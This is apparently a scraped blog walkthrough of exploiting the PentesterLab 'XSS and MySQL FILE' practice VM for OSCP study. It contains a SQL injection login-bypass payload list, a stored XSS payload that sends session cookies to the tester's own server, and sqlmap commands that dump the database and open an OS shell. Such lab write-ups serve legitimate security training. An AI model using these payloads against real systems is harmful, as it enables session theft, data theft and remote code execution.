zoukankan      html  css  js  c++  java

  • OSCP Security Technology

    OSCP Security Technology - SQL Injection(SQLi)

    Installing XSS & MySQL FILE

    https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/

    Exploit this VM

    Find the IP address(192.168.2.41) of XSS_MySQL_File virtual machine.

    netdiscover

    Browse this PentesterLab vulnerable blog through Firefox.

    image-20210808170400416

    Click button Admin.

    image-20210814155339756

    Refer to SQL Injection Authentication Bypass Cheat Sheet:

    https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

    or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

    Try to login bypass one by one.

    Another method.

    Get the cookie.

    php -S 192.168.2.26:80

    image-20210814174416542

    Submit a new query.

    <script>location.href='http://192.168.2.26/index.php?test='+document.cookie;</script>

    image-20210808174455969

    image-20210814174821194

    Then we can find the PHPSESSIONID on the backend.

    image-20210814174745927

    Modify the value of cookie to the latest one.

    image-20210814174924493

    Then we can visit admin portal without user name and password.

    image-20210814175104736

    Modify the url to try to find more vulnerabilites.

    image-20210814175145425

    image-20210814175255568

    GET parameter 'id' is vulnerable which is jinectable.

    sqlmap -u "http://192.168.2.41/admin/edit.php?id=1" --cookie=PHPSESSID=rp2a6klerscqkpedns1s4rnbo1

    image-20210814175503505

    Dump this website and crack password 'P4ssw0rd' for user 'admin'.

    sqlmap -u "http://192.168.2.41/admin/edit.php?id=1" --cookie=PHPSESSID=rp2a6klerscqkpedns1s4rnbo1 --dump

    image-20210814175712675

    image-20210814175917684

    Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell

    sqlmap -u "http://192.168.2.41/admin/edit.php?id=1" --cookie=PHPSESSID=rp2a6klerscqkpedns1s4rnbo1 --os-shell

    image-20210814180150755

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    让思考成为一种习惯:今年,我大四了
    asp.net core源码飘香:Logging组件
    asp.net core源码飘香:Options组件
    asp.net core源码飘香:Configuration组件
    asp.net core源码飘香:从Hosting开始
    webpack code split实现原理
    css specificity
    todo:read
    React Render Props 模式
    recompose mapProps 函数指南
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/15141418.html
Copyright © 2011-2022 走看看